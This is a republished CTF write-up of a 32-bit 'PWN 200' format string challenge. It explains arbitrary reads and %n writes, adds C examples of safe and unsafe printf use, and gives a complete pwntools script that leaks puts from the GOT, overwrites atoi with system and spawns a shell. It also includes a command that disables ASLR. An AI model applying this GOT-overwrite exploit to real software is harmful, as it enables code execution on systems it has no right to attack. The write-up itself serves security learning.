
Example Analysis of a PWN 200 Format String Vulnerability

2025-01-19 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

Many people with little experience do not know how to approach the PWN 200 format string vulnerability, so this article walks through the cause of the problem and the solution; I hope it helps you solve it.

The principle of the format string vulnerability

In pwn, code of the following shape is a format string vulnerability:

char str[100];
scanf("%s", str);
printf(str);

The programmer probably only intended to print the string, but because the string comes from input the user controls, it is interpreted as a format string, which creates the vulnerability.
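The two shapes side by side, as an added example that is not part of the original writeup: `render_unsafe` has the printf(str) defect described above (the untrusted text is the format argument), `render_safe` passes the same text as data for a fixed "%s" format, and `count_conversions` is a small defensive check that counts conversion specifications in untrusted text so a logging layer can reject or flag it. The input string is constructed for the demonstration and contains only "%%", so both variants stay within defined behaviour; with real conversion specifiers the unsafe variant reads stack data it was never given, which is exactly what the rest of the article exploits. Compiling with gcc -Wformat-security also reports the unsafe call.

```c
#include <stdio.h>
#include <string.h>

#define OUT_LEN 64

/* Unsafe: attacker-controlled text is the format argument.
 * This is the shape of printf(str) from the writeup. */
int render_unsafe(char *out, size_t n, const char *untrusted)
{
    return snprintf(out, n, untrusted);
}

/* Safe: the same text is passed as data for a fixed format string. */
int render_safe(char *out, size_t n, const char *untrusted)
{
    return snprintf(out, n, "%s", untrusted);
}

/* Defensive check (hypothetical helper): count conversion specifications,
 * i.e. '%' not followed by another '%', in an untrusted string. A non-zero
 * result in a field that is only ever meant to be a name is worth logging. */
int count_conversions(const char *s)
{
    int count = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {   /* "%%" is a literal percent sign */
            s++;
            continue;
        }
        count++;
    }
    return count;
}

int main(void)
{
    char out[OUT_LEN];
    const char *input = "progress 100%% done";   /* constructed input */

    render_unsafe(out, sizeof out, input);
    printf("unsafe: %s\n", out);   /* "%%" was consumed as a directive */
    render_safe(out, sizeof out, input);
    printf("safe:   %s\n", out);   /* bytes copied verbatim */

    printf("conversions in \"AAAA%%7$s\": %d\n",
           count_conversions("AAAA%7$s"));
    return 0;
}
```

The point of the pair is that the fix is a one-token change (a literal "%s" in front of the argument), while the check is only a secondary control for places where the format string cannot be made a literal, such as message catalogues.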

The sample program is as follows

Compile with gcc -m32 -o str str.c, run it, and enter %2$x.

The reason is that when printf is called directly on a string containing placeholders, the data at the corresponding stack offsets is printed as if it were the arguments. By constructing a format string, arbitrary address reads and arbitrary address writes can be achieved.

Arbitrary address read

When we enter a string through scanf (or read), the string is already on the stack. As shown in the figure, the offset is 6. If we construct a 4-byte addr followed by %6$s, we can read the value stored at that address.

Let's try typing AAAA%6$s. Of course, it is impossible to actually read memory at address 0x41414141, but from the box below I know that if we enter a valid address, we can read it.

Arbitrary address write

This works like the arbitrary address read above, but takes advantage of a relatively little-known format string feature, %n.

This placeholder writes the number of characters output before it to the specified address.

For example:

printf("abc%n", &val);

The value of val becomes 3. We usually use the fmt_str helper that comes with the pwntools-based tooling to generate the format string:

fmt_str(offset, size, addr, target)

offset is the initial offset of the address to be overwritten

size is the machine word length

addr is the address to be overwritten

target is the value we want to write into the destination variable

Open the binary in IDA and follow along with the debugging.

The code has the shape

char buf[100];
scanf("%s", buf);
printf(buf);

so this is a format string vulnerability.

Exploiting the vulnerability: run checksec to view the protections.

Tip 1: check local ASLR

Otherwise the addresses change between runs. Make sure ASLR is turned off on the machine: echo 0 > /proc/sys/kernel/randomize_va_space, and confirm that it is disabled.

Exploitation idea. The relevant decompiled code:

printf(&buf);
puts("GET YOUR AGE:\n");
read(0, &buf, 0x40u);
if (atoi(&buf) > 60)
    puts("OLD MEN!\n");

Seeing printf(&buf), read(buf) and atoi(buf), our idea is: use the arbitrary address read of the format string vulnerability to first leak the address puts_addr of the puts function. Then use the arbitrary address write of the format string vulnerability to change the address of the atoi function in the got.plt table to the address of the system function, control buf through read, pass in "/bin/sh", so that the call becomes system("/bin/sh"), and get a shell. If you do not know why overwriting the GOT works, refer to the following articles: https://www.jianshu.com/p/0ac63c3744dd and http://rickgray.me/use-gdb-to-study-got-and-plt

Leaking the address of the puts function

Arbitrary address read (reference: https://ctf-wiki.github.io/ctf-wiki/pwn/fmtstr/fmtstr_exploit.html). Debugging finds the location of the puts address on the stack.

Debugging in gdb (here I use the gef plugin), you can see that the address is at parameter 7 (analyze AAAA%7$x carefully: replace AAAA with the address and change %x to %s to print out the content at it).

Calculate the system address:

libc.symbols['system'] - libc.symbols['puts'] + u32(puts_addr)

Overwrite the atoi entry in the GOT with the system address

Principle:

printf("abc%nabc\n", &val);
printf("val = %d\n", val);

Output:

abcabc
val = 3

This tells us that %n writes the number of characters output before it to the address pointed to by &val. If this is unclear, refer to https://ctf-wiki.github.io/ctf-wiki/pwn/fmtstr/fmtstr_exploit.html and http://www.cnblogs.com/Ox9A82/p/5429099.html
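The %n behaviour introduced in the "Arbitrary address write" section and shown again in the abc%nabc principle above, as an added example that is not part of the original writeup. `count_after_abc` reproduces the val = 3 result with the article's own format string, and `count_after_width` goes one step further than the article's example: it shows that the field width of a preceding directive sets the number %n records, which is what "appropriate write value" in the text refers to. Every format string here is a literal; the only thing that makes the writeup's program vulnerable is that its format string came from input.

```c
#include <stdio.h>

/* Returns what %n stores after "abc" has been emitted.
 * The characters after %n do not count: the result is 3, not 6. */
int count_after_abc(void)
{
    int val = 0;
    char out[32];
    snprintf(out, sizeof out, "abc%nabc\n", &val);
    return val;
}

/* Returns what %n stores after a single padded directive. "%*d" with the
 * given width emits exactly `width` characters (the value 0 padded with
 * spaces), so %n records `width`. The buffer is sized so nothing is
 * truncated; widths above 200 are rejected rather than silently clipped. */
int count_after_width(int width)
{
    int val = 0;
    char out[256];
    if (width < 1 || width > 200)
        return -1;   /* out of range for this demonstration */
    snprintf(out, sizeof out, "%*d%n", width, 0, &val);
    return val;
}

int main(void)
{
    printf("abc%%nabc  -> %d\n", count_after_abc());          /* 3   */
    printf("%%100d%%n   -> %d\n", count_after_width(100));    /* 100 */
    return 0;
}
```

Because the recorded number depends only on how many characters have been emitted so far, the same mechanism is what makes a writable format string dangerous and what glibc's _FORTIFY_SOURCE checks for: with fortification enabled, %n is refused when the format string lives in writable memory, which is the condition that holds in the vulnerable program above.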

We established earlier while debugging that "AAAA" lands in the seventh parameter, so we just need to construct {addr}{appropriate write value}{%7$n}.

pwntools provides the fmtstr_payload function to generate this format string automatically: fmtstr_payload(offset, {xxx_got_addr: system_addr})

Get shell exp:

# coding:utf-8
from pwn import *

elf = ELF('pwne')
# conn = remote('ip', port)
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
# libc = ELF('libc.so.6')
p = process('./pwne')

# Round 1: leak the address of puts through the arbitrary read (%7$s).
# The prompt strings below are kept exactly as they appear in the original writeup.
p.recvuntil(b'[Ybig N]\n')
p.sendline(b'Y')
p.recvuntil(b'NAME:\n\n')
p.sendline(p32(elf.got['puts']) + b'%7$s')
p.recvuntil(b'WELCOME\n')
puts_addr = p.recv()[4:8]          # 4 bytes following the echoed address
# print(hex(u32(puts_addr)))
system_addr = libc.symbols['system'] - libc.symbols['puts'] + u32(puts_addr)
atoi_got_addr = elf.got['atoi']
p.sendline(b'17')                   # an age below 60, so the program loops

# Round 2: overwrite atoi@got with system through the arbitrary write (%7$n).
p.recvuntil(b'[YampN]\n')
p.sendline(b'Y')
p.recvuntil(b'NAME:\n\n')
p.sendline(fmtstr_payload(7, {atoi_got_addr: system_addr}))
p.recvuntil(b'GET YOUR AGE:\n\n')
p.sendline(b'/bin/sh\x00')          # atoi(buf) is now system("/bin/sh")
p.interactive()

In CTF, it is common to use the arbitrary read of a format string vulnerability to read a function's GOT entry and then calculate the address of system.

The GOT is then overwritten through the arbitrary write, so that the program ends up calling system("/bin/sh") and we get a shell.

After reading the above, have you mastered the method of example analysis for the PWN 200 format string vulnerability? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel. Thank you for reading!
